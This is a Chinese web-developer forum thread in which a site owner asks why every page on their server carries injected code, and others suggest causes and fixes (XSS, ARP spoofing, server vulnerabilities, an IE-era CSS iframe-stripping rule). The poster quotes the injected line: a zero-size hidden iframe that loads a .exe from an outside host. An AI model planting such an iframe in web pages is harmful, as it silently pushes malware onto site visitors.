页面被注入代码
0
最佳答案
1
有可能是 机房出问题了 ,以前我们公司的所有网站都有
收获园豆:30
也是这段代码?<iframe src= http://sjzromeo.eicp.net/wins.exe width=0 height=0></iframe>
直接找机房就解决了是吧?
@卤水兄: 没找 ,过段自己好了。 你看下同IP 或主机其他网站 有没有这个情况
@随静而动: 服务器上所有网站都是这个样子
@卤水兄: 当初也没有很好的解决,找了几个连接 参考下
其他回答(6)
0
不会是被跨站脚本注入了吧 楼主根据自己站点的情况具体研究下吧 搜索xxs跨站会有很多相关的东西
收获园豆:5
0
so dangerous
0
楼主的站点被别人用iframe嵌套了,楼主可以给自己的网站加一个防iframe嵌套的代码,下面用css实现的,仅供参考:
- <style type="text/css" media="all">
- iframe {
- v:expression(this.src='about:blank',this.outerHTML='');/*使用CSS属性去除所有IFRAME*/
- }
- #myiframe {v:expression() !important}
- /* 如果要使自己的IFRAME可以执行,在自己的IFRAME里加上ID="myiframe",
- 如果你的网页中没有用到IFRAME,那可以把这句代码删除,这样所有的IFRAME都将不执行 */
- </style>
收获园豆:5
您这个不能根治呀!每个页面都生成了<iframe>那段代码,真不知道它是在哪个阶段被写入的。
@卤水兄: 这个css代码写到公用的.css文件中不就好了?你的网站每个页面都会调用css文件的吧?
@新七点: 我说不能根制意思是 既然他有本事把iframe放到我的代码里,就有可能放别的代码进去。你这个方法是可以解决燃眉之急
@卤水兄: 根据你的问题描述,这段代码应该不是直接注入到你的代码文件里去的,而有可能是通过浏览器劫持的方式修改了客户端的浏览器功能。你可以先检查一下服务器上的文件是否包含异常代码,查一下病毒木马什么的,然后才能确定漏洞在哪里。
0
查看引用的js文件
收获园豆:5
0
主要是看程序是不是有漏洞还有就是系统是不是有漏洞
收获园豆:5
0
今天我们网站也出现过,具体问题还未找到
往服务器装个阻止ARP攻击的软件,360安全卫士有这个功能,如果没有找到原因,可以先试一下
